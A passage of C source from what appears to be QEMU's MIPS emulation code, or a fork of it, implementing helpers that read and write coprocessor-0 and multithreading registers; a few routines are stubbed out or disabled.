env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); uint32_t mask = 0; uint32_t newval; mask |= (1 << CP0VPEC0_MVP) | (1 << CP0VPEC0_VPA); newval = (other->CP0_VPEConf0 & ~mask) | (arg1 & mask); /* TODO: TC exclusive handling due to ERL/EXL. */ other->CP0_VPEConf0 = newval; } void helper_mtc0_vpeconf1(CPUMIPSState *env, target_ulong arg1) { uint32_t mask = 0; uint32_t newval; if (env->mvp->CP0_MVPControl & (1 << CP0MVPCo_VPC)) mask |= (0xff << CP0VPEC1_NCX) | (0xff << CP0VPEC1_NCP2) | (0xff << CP0VPEC1_NCP1); newval = (env->CP0_VPEConf1 & ~mask) | (arg1 & mask); /* UDI not implemented. */ /* CP2 not implemented. */ /* TODO: Handle FPU (CP1) binding. */ env->CP0_VPEConf1 = newval; } void helper_mtc0_yqmask(CPUMIPSState *env, target_ulong arg1) { /* Yield qualifier inputs not implemented. */ env->CP0_YQMask = 0x00000000; } void helper_mtc0_vpeopt(CPUMIPSState *env, target_ulong arg1) { env->CP0_VPEOpt = arg1 & 0x0000ffff; } #define MTC0_ENTRYLO_MASK(env) ((env->PAMask >> 6) & 0x3FFFFFFF) void helper_mtc0_entrylo0(CPUMIPSState *env, target_ulong arg1) { /* 1k pages not implemented */ target_ulong rxi = arg1 & (env->CP0_PageGrain & (3u << CP0PG_XIE)); env->CP0_EntryLo0 = (arg1 & MTC0_ENTRYLO_MASK(env)) | (rxi << (CP0EnLo_XI - 30)); } #if defined(TARGET_MIPS64) #define DMTC0_ENTRYLO_MASK(env) (env->PAMask >> 6) void helper_dmtc0_entrylo0(CPUMIPSState *env, uint64_t arg1) { uint64_t rxi = arg1 & ((env->CP0_PageGrain & (3ull << CP0PG_XIE)) << 32); env->CP0_EntryLo0 = (arg1 & DMTC0_ENTRYLO_MASK(env)) | rxi; } #endif void helper_mtc0_tcstatus(CPUMIPSState *env, target_ulong arg1) { uint32_t mask = env->CP0_TCStatus_rw_bitmask; uint32_t newval; newval = (env->active_tc.CP0_TCStatus & ~mask) | (arg1 & mask); env->active_tc.CP0_TCStatus = newval; sync_c0_tcstatus(env, env->current_tc, newval); } void helper_mttc0_tcstatus(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { other->active_tc.CP0_TCStatus = arg1; } else { other->tcs[other_tc].CP0_TCStatus = arg1; } sync_c0_tcstatus(other, other_tc, arg1); } void helper_mtc0_tcbind(CPUMIPSState *env, target_ulong arg1) { uint32_t mask = (1 << CP0TCBd_TBE); uint32_t newval; if (env->mvp->CP0_MVPControl & (1 << CP0MVPCo_VPC)) { mask |= (1 << CP0TCBd_CurVPE); } newval = (env->active_tc.CP0_TCBind & ~mask) | (arg1 & mask); env->active_tc.CP0_TCBind = newval; } void helper_mttc0_tcbind(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); uint32_t mask = (1 << CP0TCBd_TBE); uint32_t newval; CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other->mvp->CP0_MVPControl & (1 << CP0MVPCo_VPC)) { mask |= (1 << CP0TCBd_CurVPE); } if (other_tc == other->current_tc) { newval = (other->active_tc.CP0_TCBind & ~mask) | (arg1 & mask); other->active_tc.CP0_TCBind = newval; } else { newval = (other->tcs[other_tc].CP0_TCBind & ~mask) | (arg1 & mask); other->tcs[other_tc].CP0_TCBind = newval; } } void helper_mtc0_tcrestart(CPUMIPSState *env, target_ulong arg1) { env->active_tc.PC = arg1; env->active_tc.CP0_TCStatus &= ~(1 << CP0TCSt_TDS); env->CP0_LLAddr = 0; env->lladdr = 0; /* MIPS16 not implemented. */ } void helper_mttc0_tcrestart(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { other->active_tc.PC = arg1; other->active_tc.CP0_TCStatus &= ~(1 << CP0TCSt_TDS); other->CP0_LLAddr = 0; other->lladdr = 0; /* MIPS16 not implemented. */ } else { other->tcs[other_tc].PC = arg1; other->tcs[other_tc].CP0_TCStatus &= ~(1 << CP0TCSt_TDS); other->CP0_LLAddr = 0; other->lladdr = 0; /* MIPS16 not implemented. */ } } void helper_mtc0_tchalt(CPUMIPSState *env, target_ulong arg1) { MIPSCPU *cpu = env_archcpu(env); env->active_tc.CP0_TCHalt = arg1 & 0x1; /* TODO: Halt TC / Restart (if allocated+active) TC. */ if (env->active_tc.CP0_TCHalt & 1) { mips_tc_sleep(cpu, env->current_tc); } else { mips_tc_wake(cpu, env->current_tc); } } void helper_mttc0_tchalt(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); MIPSCPU *other_cpu = env_archcpu(other); /* TODO: Halt TC / Restart (if allocated+active) TC. */ if (other_tc == other->current_tc) { other->active_tc.CP0_TCHalt = arg1; } else { other->tcs[other_tc].CP0_TCHalt = arg1; } if (arg1 & 1) { mips_tc_sleep(other_cpu, other_tc); } else { mips_tc_wake(other_cpu, other_tc); } } void helper_mtc0_tccontext(CPUMIPSState *env, target_ulong arg1) { env->active_tc.CP0_TCContext = arg1; } void helper_mttc0_tccontext(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { other->active_tc.CP0_TCContext = arg1; } else { other->tcs[other_tc].CP0_TCContext = arg1; } } void helper_mtc0_tcschedule(CPUMIPSState *env, target_ulong arg1) { env->active_tc.CP0_TCSchedule = arg1; } void helper_mttc0_tcschedule(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { other->active_tc.CP0_TCSchedule = arg1; } else { other->tcs[other_tc].CP0_TCSchedule = arg1; } } void helper_mtc0_tcschefback(CPUMIPSState *env, target_ulong arg1) { env->active_tc.CP0_TCScheFBack = arg1; } void helper_mttc0_tcschefback(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { other->active_tc.CP0_TCScheFBack = arg1; } else { other->tcs[other_tc].CP0_TCScheFBack = arg1; } } void helper_mtc0_entrylo1(CPUMIPSState *env, target_ulong arg1) { /* 1k pages not implemented */ target_ulong rxi = arg1 & (env->CP0_PageGrain & (3u << CP0PG_XIE)); env->CP0_EntryLo1 = (arg1 & MTC0_ENTRYLO_MASK(env)) | (rxi << (CP0EnLo_XI - 30)); } #if defined(TARGET_MIPS64) void helper_dmtc0_entrylo1(CPUMIPSState *env, uint64_t arg1) { uint64_t rxi = arg1 & ((env->CP0_PageGrain & (3ull << CP0PG_XIE)) << 32); env->CP0_EntryLo1 = (arg1 & DMTC0_ENTRYLO_MASK(env)) | rxi; } #endif void helper_mtc0_context(CPUMIPSState *env, target_ulong arg1) { env->CP0_Context = (env->CP0_Context & 0x007FFFFF) | (arg1 & ~0x007FFFFF); } void helper_mtc0_memorymapid(CPUMIPSState *env, target_ulong arg1) { int32_t old; old = env->CP0_MemoryMapID; env->CP0_MemoryMapID = (int32_t) arg1; /* If the MemoryMapID changes, flush qemu's TLB. */ if (old != env->CP0_MemoryMapID) { cpu_mips_tlb_flush(env); } } void update_pagemask(CPUMIPSState *env, target_ulong arg1, int32_t *pagemask) { uint64_t mask = arg1 >> (TARGET_PAGE_BITS + 1); if (!(env->insn_flags & ISA_MIPS32R6) || (arg1 == ~0) || (mask == 0x0000 || mask == 0x0003 || mask == 0x000F || mask == 0x003F || mask == 0x00FF || mask == 0x03FF || mask == 0x0FFF || mask == 0x3FFF || mask == 0xFFFF)) { env->CP0_PageMask = arg1 & (0x1FFFFFFF & (TARGET_PAGE_MASK << 1)); } } void helper_mtc0_pagemask(CPUMIPSState *env, target_ulong arg1) { update_pagemask(env, arg1, &env->CP0_PageMask); } void helper_mtc0_pagegrain(CPUMIPSState *env, target_ulong arg1) { /* SmartMIPS not implemented */ /* 1k pages not implemented */ env->CP0_PageGrain = (arg1 & env->CP0_PageGrain_rw_bitmask) | (env->CP0_PageGrain & ~env->CP0_PageGrain_rw_bitmask); compute_hflags(env); restore_pamask(env); } void helper_mtc0_segctl0(CPUMIPSState *env, target_ulong arg1) { CPUState *cs = env_cpu(env); env->CP0_SegCtl0 = arg1 & CP0SC0_MASK; tlb_flush(cs); } void helper_mtc0_segctl1(CPUMIPSState *env, target_ulong arg1) { CPUState *cs = env_cpu(env); env->CP0_SegCtl1 = arg1 & CP0SC1_MASK; tlb_flush(cs); } void helper_mtc0_segctl2(CPUMIPSState *env, target_ulong arg1) { CPUState *cs = env_cpu(env); env->CP0_SegCtl2 = arg1 & CP0SC2_MASK; tlb_flush(cs); } void helper_mtc0_pwfield(CPUMIPSState *env, target_ulong arg1) { #if defined(TARGET_MIPS64) uint64_t mask = 0x3F3FFFFFFFULL; uint32_t old_ptei = (env->CP0_PWField >> CP0PF_PTEI) & 0x3FULL; uint32_t new_ptei = (arg1 >> CP0PF_PTEI) & 0x3FULL; if ((env->insn_flags & ISA_MIPS32R6)) { if (((arg1 >> CP0PF_BDI) & 0x3FULL) < 12) { mask &= ~(0x3FULL << CP0PF_BDI); } if (((arg1 >> CP0PF_GDI) & 0x3FULL) < 12) { mask &= ~(0x3FULL << CP0PF_GDI); } if (((arg1 >> CP0PF_UDI) & 0x3FULL) < 12) { mask &= ~(0x3FULL << CP0PF_UDI); } if (((arg1 >> CP0PF_MDI) & 0x3FULL) < 12) { mask &= ~(0x3FULL << CP0PF_MDI); } if (((arg1 >> CP0PF_PTI) & 0x3FULL) < 12) { mask &= ~(0x3FULL << CP0PF_PTI); } } env->CP0_PWField = arg1 & mask; if ((new_ptei >= 32) || ((env->insn_flags & ISA_MIPS32R6) && (new_ptei == 0 || new_ptei == 1))) { env->CP0_PWField = (env->CP0_PWField & ~0x3FULL) | (old_ptei << CP0PF_PTEI); } #else uint32_t mask = 0x3FFFFFFF; uint32_t old_ptew = (env->CP0_PWField >> CP0PF_PTEW) & 0x3F; uint32_t new_ptew = (arg1 >> CP0PF_PTEW) & 0x3F; if ((env->insn_flags & ISA_MIPS32R6)) { if (((arg1 >> CP0PF_GDW) & 0x3F) < 12) { mask &= ~(0x3F << CP0PF_GDW); } if (((arg1 >> CP0PF_UDW) & 0x3F) < 12) { mask &= ~(0x3F << CP0PF_UDW); } if (((arg1 >> CP0PF_MDW) & 0x3F) < 12) { mask &= ~(0x3F << CP0PF_MDW); } if (((arg1 >> CP0PF_PTW) & 0x3F) < 12) { mask &= ~(0x3F << CP0PF_PTW); } } env->CP0_PWField = arg1 & mask; if ((new_ptew >= 32) || ((env->insn_flags & ISA_MIPS32R6) && (new_ptew == 0 || new_ptew == 1))) { env->CP0_PWField = (env->CP0_PWField & ~0x3F) | (old_ptew << CP0PF_PTEW); } #endif } void helper_mtc0_pwsize(CPUMIPSState *env, target_ulong arg1) { #if defined(TARGET_MIPS64) env->CP0_PWSize = arg1 & 0x3F7FFFFFFFULL; #else env->CP0_PWSize = arg1 & 0x3FFFFFFF; #endif } void helper_mtc0_wired(CPUMIPSState *env, target_ulong arg1) { if (env->insn_flags & ISA_MIPS32R6) { if (arg1 < env->tlb->nb_tlb) { env->CP0_Wired = arg1; } } else { env->CP0_Wired = arg1 % env->tlb->nb_tlb; } } void helper_mtc0_pwctl(CPUMIPSState *env, target_ulong arg1) { #if defined(TARGET_MIPS64) /* PWEn = 0. Hardware page table walking is not implemented. */ env->CP0_PWCtl = (env->CP0_PWCtl & 0x000000C0) | (arg1 & 0x5C00003F); #else env->CP0_PWCtl = (arg1 & 0x800000FF); #endif } void helper_mtc0_srsconf0(CPUMIPSState *env, target_ulong arg1) { env->CP0_SRSConf0 |= arg1 & env->CP0_SRSConf0_rw_bitmask; } void helper_mtc0_srsconf1(CPUMIPSState *env, target_ulong arg1) { env->CP0_SRSConf1 |= arg1 & env->CP0_SRSConf1_rw_bitmask; } void helper_mtc0_srsconf2(CPUMIPSState *env, target_ulong arg1) { env->CP0_SRSConf2 |= arg1 & env->CP0_SRSConf2_rw_bitmask; } void helper_mtc0_srsconf3(CPUMIPSState *env, target_ulong arg1) { env->CP0_SRSConf3 |= arg1 & env->CP0_SRSConf3_rw_bitmask; } void helper_mtc0_srsconf4(CPUMIPSState *env, target_ulong arg1) { env->CP0_SRSConf4 |= arg1 & env->CP0_SRSConf4_rw_bitmask; } void helper_mtc0_hwrena(CPUMIPSState *env, target_ulong arg1) { uint32_t mask = 0x0000000F; if ((env->CP0_Config1 & (1 << CP0C1_PC)) && (env->insn_flags & ISA_MIPS32R6)) { mask |= (1 << 4); } if (env->insn_flags & ISA_MIPS32R6) { mask |= (1 << 5); } if (env->CP0_Config3 & (1 << CP0C3_ULRI)) { mask |= (1 << 29); if (arg1 & (1 << 29)) { env->hflags |= MIPS_HFLAG_HWRENA_ULR; } else { env->hflags &= ~MIPS_HFLAG_HWRENA_ULR; } } env->CP0_HWREna = arg1 & mask; } void helper_mtc0_count(CPUMIPSState *env, target_ulong arg1) { //cpu_mips_store_count(env, arg1); } void helper_mtc0_saari(CPUMIPSState *env, target_ulong arg1) { uint32_t target = arg1 & 0x3f; if (target <= 1) { env->CP0_SAARI = target; } } void helper_mtc0_saar(CPUMIPSState *env, target_ulong arg1) { uint32_t target = env->CP0_SAARI & 0x3f; if (target < 2) { env->CP0_SAAR[target] = arg1 & 0x00000ffffffff03fULL; switch (target) { case 0: if (env->itu) { // itc_reconfigure(env->itu); } break; } } } void helper_mthc0_saar(CPUMIPSState *env, target_ulong arg1) { uint32_t target = env->CP0_SAARI & 0x3f; if (target < 2) { env->CP0_SAAR[target] = (((uint64_t) arg1 << 32) & 0x00000fff00000000ULL) | (env->CP0_SAAR[target] & 0x00000000ffffffffULL); switch (target) { case 0: if (env->itu) { // itc_reconfigure(env->itu); } break; } } } void helper_mtc0_entryhi(CPUMIPSState *env, target_ulong arg1) { target_ulong old, val, mask; mask = (TARGET_PAGE_MASK << 1) | env->CP0_EntryHi_ASID_mask; if (((env->CP0_Config4 >> CP0C4_IE) & 0x3) >= 2) { mask |= 1 << CP0EnHi_EHINV; } /* 1k pages not implemented */ #if defined(TARGET_MIPS64) if (env->insn_flags & ISA_MIPS32R6) { int entryhi_r = extract64(arg1, 62, 2); int config0_at = extract32(env->CP0_Config0, 13, 2); bool no_supervisor = (env->CP0_Status_rw_bitmask & 0x8) == 0; if ((entryhi_r == 2) || (entryhi_r == 1 && (no_supervisor || config0_at == 1))) { /* skip EntryHi.R field if new value is reserved */ mask &= ~(0x3ull << 62); } } mask &= env->SEGMask; #endif old = env->CP0_EntryHi; val = (arg1 & mask) | (old & ~mask); env->CP0_EntryHi = val; if (env->CP0_Config3 & (1 << CP0C3_MT)) { sync_c0_entryhi(env, env->current_tc); } /* If the ASID changes, flush qemu's TLB. */ if ((old & env->CP0_EntryHi_ASID_mask) != (val & env->CP0_EntryHi_ASID_mask)) { tlb_flush(env_cpu(env)); } } void helper_mttc0_entryhi(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); other->CP0_EntryHi = arg1; sync_c0_entryhi(other, other_tc); } void helper_mtc0_compare(CPUMIPSState *env, target_ulong arg1) { // cpu_mips_store_compare(env, arg1); } void helper_mtc0_status(CPUMIPSState *env, target_ulong arg1) { cpu_mips_store_status(env, arg1); #if 0 uint32_t val, old; val = env->CP0_Status; old = env->CP0_Status; if (qemu_loglevel_mask(CPU_LOG_EXEC)) { qemu_log("Status %08x (%08x) => %08x (%08x) Cause %08x", old, old & env->CP0_Cause & CP0Ca_IP_mask, val, val & env->CP0_Cause & CP0Ca_IP_mask, env->CP0_Cause); switch (cpu_mmu_index(env, false)) { case 3: qemu_log(", ERL\n"); break; case MIPS_HFLAG_UM: qemu_log(", UM\n"); break; case MIPS_HFLAG_SM: qemu_log(", SM\n"); break; case MIPS_HFLAG_KM: qemu_log("\n"); break; default: cpu_abort(env_cpu(env), "Invalid MMU mode!\n"); break; } } #endif } void helper_mttc0_status(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); uint32_t mask = env->CP0_Status_rw_bitmask & ~0xf1000018; CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); other->CP0_Status = (other->CP0_Status & ~mask) | (arg1 & mask); sync_c0_status(env, other, other_tc); } void helper_mtc0_intctl(CPUMIPSState *env, target_ulong arg1) { env->CP0_IntCtl = (env->CP0_IntCtl & ~0x000003e0) | (arg1 & 0x000003e0); } void helper_mtc0_srsctl(CPUMIPSState *env, target_ulong arg1) { uint32_t mask = (0xf << CP0SRSCtl_ESS) | (0xf << CP0SRSCtl_PSS); env->CP0_SRSCtl = (env->CP0_SRSCtl & ~mask) | (arg1 & mask); } void helper_mtc0_cause(CPUMIPSState *env, target_ulong arg1) { cpu_mips_store_cause(env, arg1); } void helper_mttc0_cause(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); cpu_mips_store_cause(other, arg1); } target_ulong helper_mftc0_epc(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); return other->CP0_EPC; } target_ulong helper_mftc0_ebase(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); return other->CP0_EBase; } void helper_mtc0_ebase(CPUMIPSState *env, target_ulong arg1) { target_ulong mask = 0x3FFFF000 | env->CP0_EBaseWG_rw_bitmask; if (arg1 & env->CP0_EBaseWG_rw_bitmask) { mask |= ~0x3FFFFFFF; } env->CP0_EBase = (env->CP0_EBase & ~mask) | (arg1 & mask); } void helper_mttc0_ebase(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); target_ulong mask = 0x3FFFF000 | env->CP0_EBaseWG_rw_bitmask; if (arg1 & env->CP0_EBaseWG_rw_bitmask) { mask |= ~0x3FFFFFFF; } other->CP0_EBase = (other->CP0_EBase & ~mask) | (arg1 & mask); } target_ulong helper_mftc0_configx(CPUMIPSState *env, target_ulong idx) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); switch (idx) { case 0: return other->CP0_Config0; case 1: return other->CP0_Config1; case 2: return other->CP0_Config2; case 3: return other->CP0_Config3; /* 4 and 5 are reserved. */ case 6: return other->CP0_Config6; case 7: return other->CP0_Config7; default: break; } return 0; } void helper_mtc0_config0(CPUMIPSState *env, target_ulong arg1) { env->CP0_Config0 = (env->CP0_Config0 & 0x81FFFFF8) | (arg1 & 0x00000007); } void helper_mtc0_config2(CPUMIPSState *env, target_ulong arg1) { /* tertiary/secondary caches not implemented */ env->CP0_Config2 = (env->CP0_Config2 & 0x8FFF0FFF); } void helper_mtc0_config3(CPUMIPSState *env, target_ulong arg1) { if (env->insn_flags & ASE_MICROMIPS) { env->CP0_Config3 = (env->CP0_Config3 & ~(1 << CP0C3_ISA_ON_EXC)) | (arg1 & (1 << CP0C3_ISA_ON_EXC)); } } void helper_mtc0_config4(CPUMIPSState *env, target_ulong arg1) { env->CP0_Config4 = (env->CP0_Config4 & (~env->CP0_Config4_rw_bitmask)) | (arg1 & env->CP0_Config4_rw_bitmask); } void helper_mtc0_config5(CPUMIPSState *env, target_ulong arg1) { env->CP0_Config5 = (env->CP0_Config5 & (~env->CP0_Config5_rw_bitmask)) | (arg1 & env->CP0_Config5_rw_bitmask); env->CP0_EntryHi_ASID_mask = (env->CP0_Config5 & (1 << CP0C5_MI)) ? 0x0 : (env->CP0_Config4 & (1 << CP0C4_AE)) ? 0x3ff : 0xff; compute_hflags(env); } void helper_mtc0_lladdr(CPUMIPSState *env, target_ulong arg1) { target_long mask = env->CP0_LLAddr_rw_bitmask; arg1 = arg1 << env->CP0_LLAddr_shift; env->CP0_LLAddr = (env->CP0_LLAddr & ~mask) | (arg1 & mask); } #define MTC0_MAAR_MASK(env) \ ((0x1ULL << 63) | ((env->PAMask >> 4) & ~0xFFFull) | 0x3) void helper_mtc0_maar(CPUMIPSState *env, target_ulong arg1) { env->CP0_MAAR[env->CP0_MAARI] = arg1 & MTC0_MAAR_MASK(env); } void helper_mthc0_maar(CPUMIPSState *env, target_ulong arg1) { env->CP0_MAAR[env->CP0_MAARI] = (((uint64_t) arg1 << 32) & MTC0_MAAR_MASK(env)) | (env->CP0_MAAR[env->CP0_MAARI] & 0x00000000ffffffffULL); } void helper_mtc0_maari(CPUMIPSState *env, target_ulong arg1) { int index = arg1 & 0x3f; if (index == 0x3f) { /* * Software may write all ones to INDEX to determine the * maximum value supported. */ env->CP0_MAARI = MIPS_MAAR_MAX - 1; } else if (index < MIPS_MAAR_MAX) { env->CP0_MAARI = index; } /* * Other than the all ones, if the value written is not supported, * then INDEX is unchanged from its previous value. */ } void helper_mtc0_watchlo(CPUMIPSState *env, target_ulong arg1, uint32_t sel) { /* * Watch exceptions for instructions, data loads, data stores * not implemented. */ env->CP0_WatchLo[sel] = (arg1 & ~0x7); } void helper_mtc0_watchhi(CPUMIPSState *env, target_ulong arg1, uint32_t sel) { uint64_t mask = 0x40000FF8 | (env->CP0_EntryHi_ASID_mask << CP0WH_ASID); if ((env->CP0_Config5 >> CP0C5_MI) & 1) { mask |= 0xFFFFFFFF00000000ULL; /* MMID */ } env->CP0_WatchHi[sel] = arg1 & mask; env->CP0_WatchHi[sel] &= ~(env->CP0_WatchHi[sel] & arg1 & 0x7); } void helper_mthc0_watchhi(CPUMIPSState *env, target_ulong arg1, uint32_t sel) { env->CP0_WatchHi[sel] = ((uint64_t) (arg1) << 32) | (env->CP0_WatchHi[sel] & 0x00000000ffffffffULL); } void helper_mtc0_xcontext(CPUMIPSState *env, target_ulong arg1) { target_ulong mask = (1ULL << (env->SEGBITS - 7)) - 1; env->CP0_XContext = (env->CP0_XContext & mask) | (arg1 & ~mask); } void helper_mtc0_framemask(CPUMIPSState *env, target_ulong arg1) { env->CP0_Framemask = arg1; /* XXX */ } void helper_mtc0_debug(CPUMIPSState *env, target_ulong arg1) { env->CP0_Debug = (env->CP0_Debug & 0x8C03FC1F) | (arg1 & 0x13300120); if (arg1 & (1 << CP0DB_DM)) { env->hflags |= MIPS_HFLAG_DM; } else { env->hflags &= ~MIPS_HFLAG_DM; } } void helper_mttc0_debug(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); uint32_t val = arg1 & ((1 << CP0DB_SSt) | (1 << CP0DB_Halt)); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); /* XXX: Might be wrong, check with EJTAG spec. */ if (other_tc == other->current_tc) { other->active_tc.CP0_Debug_tcstatus = val; } else { other->tcs[other_tc].CP0_Debug_tcstatus = val; } other->CP0_Debug = (other->CP0_Debug & ((1 << CP0DB_SSt) | (1 << CP0DB_Halt))) | (arg1 & ~((1 << CP0DB_SSt) | (1 << CP0DB_Halt))); } void helper_mtc0_performance0(CPUMIPSState *env, target_ulong arg1) { env->CP0_Performance0 = arg1 & 0x000007ff; } void helper_mtc0_errctl(CPUMIPSState *env, target_ulong arg1) { int32_t wst = arg1 & (1 << CP0EC_WST); int32_t spr = arg1 & (1 << CP0EC_SPR); int32_t itc = env->itc_tag ? (arg1 & (1 << CP0EC_ITC)) : 0; env->CP0_ErrCtl = wst | spr | itc; if (itc && !wst && !spr) { env->hflags |= MIPS_HFLAG_ITC_CACHE; } else { env->hflags &= ~MIPS_HFLAG_ITC_CACHE; } } void helper_mtc0_taglo(CPUMIPSState *env, target_ulong arg1) { if (env->hflags & MIPS_HFLAG_ITC_CACHE) { /* * If CACHE instruction is configured for ITC tags then make all * CP0.TagLo bits writable. The actual write to ITC Configuration * Tag will take care of the read-only bits. */ env->CP0_TagLo = arg1; } else { env->CP0_TagLo = arg1 & 0xFFFFFCF6; } } void helper_mtc0_datalo(CPUMIPSState *env, target_ulong arg1) { env->CP0_DataLo = arg1; /* XXX */ } void helper_mtc0_taghi(CPUMIPSState *env, target_ulong arg1) { env->CP0_TagHi = arg1; /* XXX */ } void helper_mtc0_datahi(CPUMIPSState *env, target_ulong arg1) { env->CP0_DataHi = arg1; /* XXX */ } /* MIPS MT functions */ target_ulong helper_mftgpr(CPUMIPSState *env, uint32_t sel) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { return other->active_tc.gpr[sel]; } else { return other->tcs[other_tc].gpr[sel]; } } target_ulong helper_mftlo(CPUMIPSState *env, uint32_t sel) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { return other->active_tc.LO[sel]; } else { return other->tcs[other_tc].LO[sel]; } } target_ulong helper_mfthi(CPUMIPSState *env, uint32_t sel) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { return other->active_tc.HI[sel]; } else { return other->tcs[other_tc].HI[sel]; } } target_ulong helper_mftacx(CPUMIPSState *env, uint32_t sel) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { return other->active_tc.ACX[sel]; } else { return other->tcs[other_tc].ACX[sel]; } } target_ulong helper_mftdsp(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { return other->active_tc.DSPControl; } else { return other->tcs[other_tc].DSPControl; } } void helper_mttgpr(CPUMIPSState *env, target_ulong arg1, uint32_t sel) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { other->active_tc.gpr[sel] = arg1; } else { other->tcs[other_tc].gpr[sel] = arg1; } } void helper_mttlo(CPUMIPSState *env, target_ulong arg1, uint32_t sel) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { other->active_tc.LO[sel] = arg1; } else { other->tcs[other_tc].LO[sel] = arg1; } } void helper_mtthi(CPUMIPSState *env, target_ulong arg1, uint32_t sel) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { other->active_tc.HI[sel] = arg1; } else { other->tcs[other_tc].HI[sel] = arg1; } } void helper_mttacx(CPUMIPSState *env, target_ulong arg1, uint32_t sel) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { other->active_tc.ACX[sel] = arg1; } else { other->tcs[other_tc].ACX[sel] = arg1; } } void helper_mttdsp(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { other->active_tc.DSPControl = arg1; } else { other->tcs[other_tc].DSPControl = arg1; } } /* MIPS MT functions */ target_ulong helper_dmt(void) { /* TODO */ return 0; } target_ulong helper_emt(void) { /* TODO */ return 0; } target_ulong helper_dvpe(CPUMIPSState *env) { #if 0 // FIXME CPUState *other_cs = first_cpu; target_ulong prev = env->mvp->CP0_MVPControl; CPU_FOREACH(other_cs) { MIPSCPU *other_cpu = MIPS_CPU(other_cs); /* Turn off all VPEs except the one executing the dvpe. */ if (&other_cpu->env != env) { other_cpu->env.mvp->CP0_MVPControl &= ~(1 << CP0MVPCo_EVP); mips_vpe_sleep(other_cpu); } } return prev; #endif return 0; } target_ulong helper_evpe(CPUMIPSState *env) { #if 0 CPUState *other_cs = first_cpu; target_ulong prev = env->mvp->CP0_MVPControl; CPU_FOREACH(other_cs) { MIPSCPU *other_cpu = MIPS_CPU(other_cs); if (&other_cpu->env != env /* If the VPE is WFI, don't disturb its sleep. */ && !mips_vpe_is_wfi(other_cpu)) { /* Enable the VPE. */ other_cpu->env.mvp->CP0_MVPControl |= (1 << CP0MVPCo_EVP); mips_vpe_wake(other_cpu); /* And wake it up. */ } } return prev; #endif return 0; } /* R6 Multi-threading */ target_ulong helper_dvp(CPUMIPSState *env) { #if 0 CPUState *other_cs = first_cpu; target_ulong prev = env->CP0_VPControl; if (!((env->CP0_VPControl >> CP0VPCtl_DIS) & 1)) { CPU_FOREACH(other_cs) { MIPSCPU *other_cpu = 